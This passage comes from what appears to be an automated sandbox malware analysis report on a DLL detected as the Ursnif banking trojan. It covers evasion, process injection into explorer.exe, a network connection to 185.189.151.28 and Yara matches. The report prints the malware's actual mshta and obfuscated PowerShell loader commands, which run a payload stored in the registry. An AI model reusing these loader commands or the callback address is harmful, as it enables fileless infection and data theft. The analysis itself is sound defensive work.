                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6852Thread sleep time: -12912720851596678s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zn133k50.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nthaltvx.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6200
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3221
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB65C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB99BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CCBAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBFD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
                      Source: explorer.exe, 00000019.00000000.509234850.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000019.00000000.476427259.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
                      Source: explorer.exe, 00000019.00000000.496672719.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: explorer.exe, 00000019.00000000.505272751.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000019.00000000.498968199.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
                      Source: rundll32.exe, 00000003.00000003.403411148.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403462747.0000000002DEB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501461049.0000000002E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000019.00000000.509234850.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: explorer.exe, 00000019.00000000.490287156.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
                      Source: rundll32.exe, 00000003.00000003.403411148.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501461049.0000000002E21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWD
                      Source: mshta.exe, 0000000D.00000003.410851238.000001C7D9B50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}n
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CBEC00 RegOpenKeyA,LoadLibraryA,GetProcAddress,GetLastError,FreeLibrary,GetLastError,RegCloseKey,
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CB8FEC StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7BF3512E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF7BF3512E0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\explorer.exe base: 49C000
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 49C000 value: 00
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: PID: 3968 base: 7FFC86661580 value: EB
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\explorer.exe EIP: 86661580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP"
                      Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000019.00000000.462244926.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.476444005.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.496655082.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
                      Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.503922140.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.490134138.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000019.00000000.476464537.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.462256144.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.496672719.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
                      Source: explorer.exe, 00000019.00000000.462449175.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.476899284.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000019.00000000.497029155.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C73365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04CC81F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C776BB GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C76D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04C73365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
